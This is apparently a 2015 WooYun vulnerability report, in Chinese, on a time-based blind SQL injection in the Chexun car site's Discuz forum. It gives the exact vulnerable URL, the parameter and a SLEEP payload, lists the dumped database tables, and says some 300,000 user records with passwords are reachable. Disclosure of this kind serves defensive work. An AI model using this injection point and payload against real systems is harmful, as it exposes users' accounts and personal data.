当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133794

漏洞标题:车讯网BBS存在SQL注入漏洞(可获取30W+用户信息含密码)

相关厂商:车讯网

漏洞作者: 路人甲

提交时间:2015-08-13 11:03

修复时间:2015-08-18 11:04

公开时间:2015-08-18 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

test

详细说明:

车讯网bbs存在sql注入漏洞,可获取几十万论坛用户信息

漏洞证明:

注入点:http://bbs.chexun.com/api/ucuser1.php?callback=messagenum&mod=notice&r=0.02613745385060029&uid=null

Place: GET
Parameter: info
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: info=51 AND SLEEP(5)


通过注入可以获取到数据信息

4.jpg


当前库为discuz
可以跑出345个表

3.jpg


+---------------------------------------+
| bbs_home_doing_mderate                |
| bbs_common_addon                      |
| bbs_common_admincp_cmenu              |
| bbs_common_admincp_group              |
| bbs_common_admincp_member             |
| bbs_common_admincp_perm               |
| bbs_common_admincp_session            |
| bbs_common_admingroup                 |
| bbs_common_adminnote                  |
| bbs_common_advertisement              |
| bbs_common_advertisement_iustom       |
| bbs_common_banned                     |
| bbs_common_block                      |
| bbs_common_block_favorite             |
| bbs_common_block_item                 |
| bbs_common_block_item_data            |
| bbs_common_block_permission           |
| bbs_common_block_pic                  |
| bbs_common_block_style                |
| bbs_common_block_user_recommend       |
| bbs_common_block_xml                  |
| bbs_common_cache                      |
| bbs_common_card                       |
| bbs_common_card_log                   |
| bbs_common_card_type                  |
| bbs_common_connect_guest              |
| bbs_common_credit_log                 |
| bbs_common_credit_log_field           |
| bbs_common_credit_rule                |
| bbs_common_credit_rule_log            |
| bbs_common_credit_rule_log_field      |
| bbs_common_cron                       |
| bbs_common_devicetoken                |
| bbs_common_district                   |
| bbs_common_diy_data                   |
| bbs_common_domain                     |
| bbs_common_failedlogin                |
| bbs_common_friendlink                 |
| bbs_common_grouppm                    |
| bbs_common_invite                     |
| bbs_common_magic                      |
| bbs_common_magiclog                   |
| bbs_common_mailcron                   |
| bbs_common_mailqueue                  |
| bbs_common_member                     |
| bbs_common_member_archive             |
| bbs_common_member_bction_log          |
| bbs_common_member_connect             |
| 。


| cdb_uc_members                        |
| cdb_uc_mergemembers                   |
| cdb_uc_newpm                          |
| cdb_uc_notelist                       |
| cdb_uc_pm_indexes                     |
| cdb_uc_pm_lists                       |
| cdb_uc_pm_members                     |
| cdb_uc_pm_messages_0                  |
| cdb_uc_pm_messages_1                  |
| cdb_uc_pm_messages_2                  |
| cdb_uc_pm_messages_3                  |
| cdb_uc_pm_messages_4                  |
| cdb_uc_pm_messages_5                  |
| cdb_uc_pm_messages_6                  |
| cdb_uc_pm_messages_7                  |
| cdb_uc_pm_messages_8                  |
| cdb_uc_pm_messages_9                  |
| cdb_uc_pms                            |
| cdb_uc_protectedmembers               |
| cdb_uc_settings                       |
| cdb_uc_sqlcache                       |
| cdb_uc_tags                           |
| cdb_uc_vars                           |
| cx_pinche                             |
| cx_pinchebx                           |
| cx_weather                            |
| cxdata_login                          |
| cxdata_register                       |
| cxdata_upload_log                     |
+---------------------------------------+


跑了一下bbs_common_member表内有30万数据,基于时间的注入,跑的太慢了,就跑两条验证一下吧

1.jpg


2.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-18 11:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无